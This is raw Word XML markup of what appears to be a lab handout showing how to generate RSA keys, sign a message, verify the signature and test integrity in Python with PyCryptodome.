    <w:p w14:paraId="614D6B5B" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="226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private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key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="721C5B4C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private_key_obj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RSA.import_key(private_key)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E75943" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="225"/>
        <w:ind w:left="840" w:right="114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private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hashed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message signature = pkcs1_15.new(private_key_obj).sign(h)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A58337B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signature</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24BBF537" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59BAF873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digital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signature</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74DA39D4" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="840" w:right="3670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verify_signature(message,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signature,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public_key): # Hash the message</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E962FD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h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2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>SHA256.new(message.encode())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E87702E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2CE780AF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key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="484089AC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public_key_obj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RSA.import_key(public_key)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EEE6BFD" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BB1C750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 w14:paraId="7E383262" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="2"/>
        <w:ind w:left="1320" w:right="2222"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t># Verify the signature using the public key pkcs1_15.new(public_key_obj).verify(h,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signature) print("Signature is valid!")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF1D023" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="1320" w:right="4139" w:hanging="480"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>except (ValueError, TypeError): print("Signature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verification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failed!")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CAB656" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="226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function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C20976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pacing w:val="-5"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F1D666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RSA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BADB6C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private_key,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public_key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generate_keys()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B80AC4D" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="125EFFA9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Define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message</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6182A945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message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"This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message!"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA4A2B7" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="030340D8" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="242" w:lineRule="auto"/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3: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digital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message print(f"Original Message: {message}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EDB4369" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="223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signature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create_signature(message,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private_key)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB5DBAE" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57B96618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Print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(in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hexadecimal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format)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8E9649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print(f"Digital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Signature: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2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>{binascii.hexlify(signature).decode()}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F285A1E" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A160472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4: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digital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signature</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B55133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print("\nVerifying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key...") verify_signature(message, signature, public_key)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF8C575" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="195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61BBC842" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="64"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BFE7300" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31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digital_signature.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8EBDD5" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31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5E1597E0" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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7D70642F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C049EC" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="83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digital_signature.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE0BD78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1AD1A386" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:spacing w:line="237" w:lineRule="auto"/>
        <w:ind w:right="123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public-private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pair,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signature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message, and verify the signature.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="777B1A20" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="14"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48A644A5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Verifying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Digital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Signature</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA45412" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="59"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="143A001F" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31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script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generates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b/>
        </w:rPr>
        <w:t>private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key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b/>
        </w:rPr>
        <w:t>public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4"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102366FA" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31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It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creates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</w:rPr>
        <w:t>digital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signature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private</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393243C3" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:spacing w:before="1"/>
        <w:ind w:right="55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verifies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signature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comparing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decrypted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hash from the signature using the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
        </w:rPr>
        <w:t>public key</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585E597E" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="17"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="369C25D1" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="36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signature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valid,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"Signature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valid!"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otherwise,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"Signature verification failed!"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F63A41C" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C9B9033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6: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Testing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Signature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Integrity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F7E00E" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="54"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E5B1F4C" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>To</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>test the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2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digital </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>signature:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38CC98E0" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="7"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C11A35E" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30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signature</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> again.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB50664" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1078"/>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:ind w:right="47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signature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because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longer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matches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original </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>one.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC321D7" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000"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ACF0061" wp14:editId="324E6EC4">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>296119</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6173470" cy="2095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1704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647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1704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7348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7" y="33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7360"/>
                            <a:ext cx="6173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810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0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3048" y="3340"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6170028" y="3340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810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340"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6173152" y="3340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56E6F" id="Group 52" o:spid="_x0000_s1026" style="position:absolute;margin-left:1in;margin-top:23.3pt;width:486.1pt;height:1.65pt;z-index:-15724032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WUeAQAAH8YAAAOAAAAZHJzL2Uyb0RvYy54bWzsWW1v2zYQ/j5g/0HQ90WSZcuOEKcY2iYY&#10;UHQFmmGfab1YwiRRI2nL+fc7kjq92q7spc2HBgZMSjyRd8/dc3eW794d8szYR4yntFibzo1tGlER&#10;0DAttmvzr6eH31amwQUpQpLRIlqbzxE3393/+stdVfrRjCY0CyNmwCYF96tybSZClL5l8SCJcsJv&#10;aBkVsBhTlhMBl2xrhYxUsHueWTPb9qyKsrBkNIg4h7sf9KJ5r/aP4ygQf8Yxj4SRrU3QTahvpr43&#10;8tu6vyP+lpEySYNaDXKFFjlJCzi02eoDEcTYsXS0VZ4GjHIai5uA5haN4zSIlA1gjWMPrHlkdFcq&#10;W7Z+tS0bmADaAU5Xbxt83j+y8mv5hWntYfqJBv9wwMWqyq3fXZfX21b4ELNcPgRGGAeF6HODaHQQ&#10;RgA3PWfpzpcAfABrM/t2sdCIBwm4ZfRUkHw8+5xFfH2oUq1RpSohdngLD/9/8HxNSBkp1Lk0/wsz&#10;0nBtLlzTKEgOIfxYRwvcAZTk4SAlEayveA3mRHxmEMYaH+fWWyl8GjuJH+y4eIyoAprsP3GhAzbE&#10;GUlwFhwKnDIIexnwmQp4YRoQ8Mw0IOA3Gv6SCPmc9J6cGpXylNYkARorReRqTvfRE1VyQroL/Kml&#10;0NWgaiuTFV1ZsKojhWs4lmo/LdM1HNdx1HLdcy+TVhQHLXG/IKM8AhDhljS9mSg44GYXcE6zNHxI&#10;s0wCwNl28z5jxp4AsrcP8iPBhEc6YhCY3NcBIGcbGj5D/FQQMWuT/7sjLDKN7I8CIhQsFzhhONng&#10;hInsPVUpS2HPuHg6/E1YaZQwXZsC+PWZYqASHyNDGtXIyicL+vtO0DiVYaN00xrVF0AaHcDfnz3z&#10;EXvmF7EHAsCezxwVUp5bZxHMMq6zXGgKqZn2CtKv61DECfL0yzNIawH0UROJfssMHcWuPV/2SNEK&#10;YHh2aTEM3WMyakttMC7jODhzuuTw3JehzMeZ/LxRZlzmkcd1KcGCAyE9KDgq7CcXHHC4pgsEHUQI&#10;8ZEuvaLsLJ35axYd3R7IoqMUOUEb6CKhlri2Zj6kufPM6QgiG3DsEszxlgunjkhcx7Fhjz76AtEj&#10;h48Y1Ku7EyCQLnMWs0nJQ6ZKx+knGrQKR21dV/KI1iPhRoWLhL9POnmrwPKXz7FfDSfSiTdKJ97V&#10;Fdj1ViqTtzmlLcGOewsN/2vXYK3FiWzS58b5VIKmIBlw7OURd+lgDsV1HJs8og91posOTx4lEdnt&#10;YSMP826j02lJB53rWxm+kDfgt0EZVuX04jIMGXy+6hfiljTuykF3v2LfKpX4QZRxXahm0/rWyZKI&#10;IFLvZQjzVmguJAw0TAPCqLC/hjCecmlbZXqd62typlFE/tw7RRvZXtkz3T9ibJ4qNtCs9wUxiHHs&#10;1hvcDNdw7Mq47vy8WHPiNyW7dlwkPFRgRMjjbfA5QJsWFPc+BahU+oou+FuoScdjIz4Fi0YY9UVf&#10;jbD42au5eqcLb7nVK7X6jbx8jd69Vu+t2v8N7v8DAAD//wMAUEsDBBQABgAIAAAAIQCi/36B4AAA&#10;AAoBAAAPAAAAZHJzL2Rvd25yZXYueG1sTI9BS8NAEIXvgv9hGcGb3aTGYGM2pRT1VARbofS2zU6T&#10;0OxsyG6T9N87PenxvXm8+V6+nGwrBux940hBPItAIJXONFQp+Nl9PL2C8EGT0a0jVHBFD8vi/i7X&#10;mXEjfeOwDZXgEvKZVlCH0GVS+rJGq/3MdUh8O7ne6sCyr6Tp9cjltpXzKEql1Q3xh1p3uK6xPG8v&#10;VsHnqMfVc/w+bM6n9fWwe/nab2JU6vFhWr2BCDiFvzDc8BkdCmY6ugsZL1rWScJbgoIkTUHcAnGc&#10;zkEc2VksQBa5/D+h+AUAAP//AwBQSwECLQAUAAYACAAAACEAtoM4kv4AAADhAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQA4/SH/1gAAAJQBAAAL&#10;AAAAAAAAAAAAAAAAAC8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQCP7WWUeAQAAH8YAAAO&#10;AAAAAAAAAAAAAAAAAC4CAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQCi/36B4AAAAAoB&#10;AAAPAAAAAAAAAAAAAAAAANIGAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAA3wcAAAAA&#10;">
                <v:shape id="Graphic 53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F8xQAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI/NbsIw&#10;EITvSH0Hayv1RpxSFUoagxAFtUegSFyXePPTxus0NhB4elwJieNoZr7RpNPO1OJIrassK3iOYhDE&#10;mdUVFwq238v+GwjnkTXWlknBmRxMJw+9FBNtT7ym48YXIkDYJaig9L5JpHRZSQZdZBvi4OW2NeiD&#10;bAupWzwFuKnlII6H0mDFYaHEhuYlZb+bg1Gw3+qPv9V4MNLFOd8tPn8utKeLUk+P3ewdhKfO38O3&#10;9pdW8PoC/1/CD5CTKwAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAAL&#10;AAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQBJbUF8xQAAANsAAAAP&#10;AAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA+QIAAAAA&#10;" path="m6172200,l,,,19685r6172200,l6172200,xe" fillcolor="#9f9f9f" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 54" o:spid="_x0000_s1028" style="position:absolute;left:61704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Ym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jYRibEAAAA2wAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" path="m3047,l,,,3047r3047,l3047,xe" fillcolor="#e2e2e2" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 55" o:spid="_x0000_s1029" style="position:absolute;left:3;top:6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7mxAAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9BawIx&#10;FITvQv9DeAVvNVtFq1ujqFBoD7ZUZaG3x+Z1s7h5WZKo239vhILHYWa+YebLzjbiTD7UjhU8DzIQ&#10;xKXTNVcKDvu3pymIEJE1No5JwR8FWC4eenPMtbvwN513sRIJwiFHBSbGNpcylIYshoFriZP367zF&#10;mKSvpPZ4SXDbyGGWTaTFmtOCwZY2hsrj7mQVFN6b1dfndk0fo/anfsmK2ToUSvUfu9UriEhdvIf/&#10;2+9awXgMty/pB8jFFQAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAHldXubEAAAA2w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56" o:spid="_x0000_s1030" style="position:absolute;left:61704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jz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CmUmjzwgAAANsAAAAPAAAA&#10;AAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA9gIAAAAA&#10;" path="m3047,l,,,13715r3047,l3047,xe" fillcolor="#e2e2e2" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 57" o:spid="_x0000_s1031" style="position:absolute;left:3;top:173;width:31;height:38;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="3175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dowgAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI/BasMw&#10;EETvhf6D2EAvpZYTsFtcK6EUUnILdvIBi7SxTayVaymO8/dRoNDjMDNvmHIz215MNPrOsYJlkoIg&#10;1s503Cg4HrZvHyB8QDbYOyYFN/KwWT8/lVgYd+WKpjo0IkLYF6igDWEopPS6JYs+cQNx9E5utBii&#10;HBtpRrxGuO3lKk1zabHjuNDiQN8t6XN9sQour5SttN3nTYZS/1TulP/eJqVeFvPXJ4hAc/gP/7V3&#10;RkH2Do8v8QfI9R0AAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAAAAAA&#10;AAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAALAAAA&#10;AAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQBh7QdowgAAANsAAAAPAAAA&#10;AAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA9gIAAAAA&#10;" path="m3047,l,,,3352r3047,l3047,xe" fillcolor="#9f9f9f" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 58" o:spid="_x0000_s1032" style="position:absolute;left:3;top:173;width:61734;height:38;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="617347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0ywAAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9Ni8Iw&#10;EL0L+x/CLHjT1AVFukYRUVhYRFqL63FoxrbYTEqS1frvzUHw+Hjfi1VvWnEj5xvLCibjBARxaXXD&#10;lYLiuBvNQfiArLG1TAoe5GG1/BgsMNX2zhnd8lCJGMI+RQV1CF0qpS9rMujHtiOO3MU6gyFCV0nt&#10;8B7DTSu/kmQmDTYcG2rsaFNTec3/jQJO3PSaObv9+w2HbH+eNaci3yg1/OzX3yAC9eEtfrl/tIJp&#10;HBu/xB8gl08AAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAAAAAA&#10;AAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAAAAAA&#10;AAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAt5XNMsAAAADbAAAADwAAAAAA&#10;AAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPQCAAAAAA==&#10;" path="m6170028,l3048,,,,,3340r3048,l6170028,3340r,-3340xem6173152,r-3035,l6170117,3340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F60428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5B0A3E35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330162A1" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="59"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57317921" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="30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generates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pair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(private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public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keys).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2000BB23" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="30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creates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digital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signature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private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verifies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signature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public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4"/>
        </w:rPr>
        <w:t>key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5717E084" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:spacing w:before="1"/>
        <w:ind w:right="965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signature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verified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successfully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intact.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altered,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 verification should fail.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0D07A3" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="19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FC33C4" wp14:editId="375AA285">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>296634</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6173470" cy="2095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1704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774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538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E32B5" id="Group 59" o:spid="_x0000_s1026" 